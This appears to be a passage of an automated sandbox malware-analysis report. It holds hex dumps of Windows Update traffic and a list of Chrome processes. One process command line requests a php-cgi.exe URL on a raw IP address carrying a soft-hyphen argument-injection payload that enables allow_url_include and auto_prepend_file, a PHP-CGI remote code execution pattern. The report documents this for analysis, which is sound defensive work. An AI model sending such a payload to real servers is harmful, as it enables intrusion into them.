        2024-10-01 06:34:29 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
        2024-10-01 06:34:29 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.2.4599824.245.163.56443
        TimestampBytes transferredDirectionData
        2024-10-01 06:35:07 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=K6e1fB3VC+yT2by&MD=XFT7N15t HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
        Host: slscr.update.microsoft.com
        2024-10-01 06:35:07 UTC560INHTTP/1.1 200 OK
        Cache-Control: no-cache
        Pragma: no-cache
        Content-Type: application/octet-stream
        Expires: -1
        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
        ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
        MS-CorrelationId: 26774256-6bb9-4eec-945a-1fc1c535c40e
        MS-RequestId: 5e031286-500e-4f30-a197-9cef0f4d69ed
        MS-CV: t2Mr+au6tkGYiQDp.0
        X-Microsoft-SLSClientCache: 1440
        Content-Disposition: attachment; filename=environment.cab
        X-Content-Type-Options: nosniff
        Date: Tue, 01 Oct 2024 06:35:07 GMT
        Connection: close
        Content-Length: 30005
        2024-10-01 06:35:07 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
        Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
        2024-10-01 06:35:07 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
        Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


        Click to jump to process

        Click to jump to process

        Click to jump to process

        Target ID:0
        Start time:02:34:08
        Start date:01/10/2024
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Imagebase:0x7ff76e190000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:false

        Target ID:2
        Start time:02:34:12
        Start date:01/10/2024
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1712,i,2063851336080282248,6247114304570441258,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Imagebase:0x7ff76e190000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:false

        Target ID:3
        Start time:02:34:14
        Start date:01/10/2024
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://62.96.227.70:80/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp"
        Imagebase:0x7ff76e190000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        No disassembly